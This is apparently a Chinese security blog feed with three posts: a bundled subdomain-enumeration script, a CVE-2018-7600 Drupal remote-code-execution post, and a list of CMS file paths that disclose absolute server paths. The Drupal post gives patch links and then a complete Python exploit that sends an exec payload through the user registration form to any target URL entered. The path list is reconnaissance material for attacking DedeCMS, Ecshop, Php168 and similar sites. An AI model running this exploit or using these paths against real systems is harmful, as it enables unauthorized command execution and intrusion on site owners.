收集 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Thu, 17 May 2018 12:53:55 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 子域名收集脚本 /tools/402.html Sat, 21 Apr 2018 14:51:32 +0000 /?p=337 演示

kali下运行。需要配置三款工具所需的模块脚本

Shell脚本集成了

SubDomain
Sublist
Teemo

链接:https://pan.baidu.com/s/1KbYkQbC4uXK_HDDSl8IWEg 密码:ydsk

]]> CVE-2018-7600 Drupal 远程命令执行漏洞EXP /web/399.html Sat, 14 Apr 2018 15:19:00 +0000 /?p=328 CVE-2018-7600

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .

影响版本

  1. Drupal 6
  2. Drupal 7
  3. Drupal 8

修复建议

Drupal 6.x的修复参考以下网站:

https://www.drupal.org/project/d6lts

Drupal 7.x请升级到Drupal 7.5.8版本,

同时官方给出7.X补丁,若用户无法立即升级版本,请更新补丁,补丁地址为:

https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5

Drupal 8.5.x请升级到Drupal 8.5.1版本

同时官方给出8.5.X补丁,若用户无法立即升级版本,请更新补丁,补丁地址为:

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

Drupal 8.3.x和8.4.x版本官方已不进行维护,但此漏洞非常严重,官方此次也给出了对应补丁,补丁同8.5.x版本:补丁地址为:

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

由于Drupal 8.3.x和8.4.x版本官方已不进行维护,建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本

友情提示

Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护,请各位用户升级到官方维护的版本

EXP

#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
]]> cms爆绝对路径收集 /web/389.html Wed, 28 Mar 2018 16:28:30 +0000 /?p=318 DeDeCms 
/member/templets/menulit.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php

WordPress

/wp-admin/includes/file.php
/wp-content/themes/baiaogu-seo/footer.php

Ecshop商城系统暴路径漏洞文件

/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

Ucenter爆路径

/ucenter/control/admin/db.php

DZbbs

/manyou/admincp.php?my_suffix=%0A%0DTOBY57

Z-blog

/admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

Php168爆路径

/admin/inc/hack/count.php?job=list
/admin/inc/hack/search.php?job=getcode
/admin/inc/ajax/bencandy.php?job=do
/cache/MysqlTime.txt
/PHPcms2008-sp4

注册用户登陆后访问

/phpcms/corpandresize/process.php?pic=../images/logo.gif

CMSeasy爆网站路径漏洞

漏洞出现在menu_top.php这个文件中

/lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
/lib/default/special_act.php
]]>